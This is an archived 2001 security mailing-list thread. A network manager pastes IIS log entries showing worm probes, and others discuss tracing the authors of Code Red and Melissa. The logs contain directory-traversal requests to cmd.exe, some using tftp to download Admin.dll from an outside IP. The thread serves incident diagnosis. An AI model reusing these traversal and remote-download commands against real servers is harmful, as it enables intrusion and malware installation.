Thank you. But we have earlier catches to almost an hour earlier. (I'm assuming your timestamp is PDT.) Appears a lot of people have running logs to gauge CodeRed. They saw this worm hit quite dramatically. Jimmy > -----Original Message----- > From: J.Michael Cuciti [SMTP:mcuciti@private] > Sent: Friday, September 21, 2001 1:44 PM > To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri > Cc: crime@private > Subject: Re: [RE: Any leads?] > > All: > > I still have a script trying to run, but the location and folder doesn't > exist. The is what I found in my log file: > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, > 304, > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll, > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, > 304, > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll, > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, > 273, > 403, 5, GET, /scripts/root.exe, /c+dir, > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, > 1652, > 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, > 243, > 500, 123, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, > > If anybody knows what this is, please 'spain it to me. > > I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I inherited this, not > my > fault :-) ) > > In the event log I see this same type of message running every few > minutes. > The script is supposedly running from > \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist. > > Thanks... > > Mike Cuciti > Network Service and Support MAnager > Tuality Healthcare > 681.1749 > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote: > >The Melissa author was caught because he posted the infectious document > >from his own AOL account to a news group, rather than releasing it > >through a hacked account. His guilt was confirmed when the serial number > >in the document matched the PC in the dumpster outside his bedroom :-) > > No. He used a hacked acct. But we identified the exact time of the use > of > the acct (newsgroup posting message ID) and the FBI traced the phone > records. > > And the PC was destroyed and never located. > > Where did you get your version of the story? > > >But Code Red and its derivatives is not an Office document, and > >therefore has no serial numbers. That investigators appear to have no > >leads months after Code Red appeared tells me that it was likely > >released to the wild from a compromised machine, or perhaps > >simultaneously released from multiple compromised machines. If the > >author(s) were good, then those compromised machines were initially > >attacked from other compromised machines. Likely all of these initial > >release vector machines have long since been wiped and re-installed, and > >the links to the author(s) have been cut. > > We have some "first instances" of traffic. I don't know what the FBI's > doing with the information gathered so far. But I agree that it's > difficult > and not likely. > > Jimmy
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:42 PDT